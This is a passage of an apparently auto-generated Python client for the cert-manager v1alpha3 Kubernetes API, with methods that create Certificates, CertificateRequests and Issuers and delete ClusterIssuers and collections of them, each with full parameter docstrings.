def create_namespaced_certificate(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_certificate # noqa: E501
create a Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_certificate(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_namespaced_certificate_with_http_info(namespace, body, **kwargs) # noqa: E501
def create_namespaced_certificate_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_certificate # noqa: E501
create a Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_certificate_with_http_info(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `create_namespaced_certificate`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_namespaced_certificate_request(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_certificate_request # noqa: E501
create a CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_certificate_request(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_namespaced_certificate_request_with_http_info(namespace, body, **kwargs) # noqa: E501
def create_namespaced_certificate_request_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_certificate_request # noqa: E501
create a CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_certificate_request_with_http_info(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `create_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_namespaced_issuer(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_issuer # noqa: E501
create an Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_issuer(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_namespaced_issuer_with_http_info(namespace, body, **kwargs) # noqa: E501
def create_namespaced_issuer_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_namespaced_issuer # noqa: E501
create an Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_namespaced_issuer_with_http_info(namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `create_namespaced_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_cluster_issuer(self, name, **kwargs): # noqa: E501
"""delete_cluster_issuer # noqa: E501
delete a ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_cluster_issuer(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_cluster_issuer_with_http_info(name, **kwargs) # noqa: E501
def delete_cluster_issuer_with_http_info(self, name, **kwargs): # noqa: E501
"""delete_cluster_issuer # noqa: E501
delete a ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_cluster_issuer_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'pretty',
'dry_run',
'grace_period_seconds',
'orphan_dependents',
'propagation_policy',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'grace_period_seconds' in local_var_params and local_var_params['grace_period_seconds'] is not None: # noqa: E501
query_params.append(('gracePeriodSeconds', local_var_params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in local_var_params and local_var_params['orphan_dependents'] is not None: # noqa: E501
query_params.append(('orphanDependents', local_var_params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in local_var_params and local_var_params['propagation_policy'] is not None: # noqa: E501
query_params.append(('propagationPolicy', local_var_params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_cluster_issuer(self, **kwargs): # noqa: E501
"""delete_collection_cluster_issuer # noqa: E501
delete collection of ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_cluster_issuer(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_collection_cluster_issuer_with_http_info(**kwargs) # noqa: E501
def delete_collection_cluster_issuer_with_http_info(self, **kwargs): # noqa: E501
"""delete_collection_cluster_issuer # noqa: E501
delete collection of ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_cluster_issuer_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'pretty',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_certificate(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_certificate # noqa: E501
delete collection of Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_certificate(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
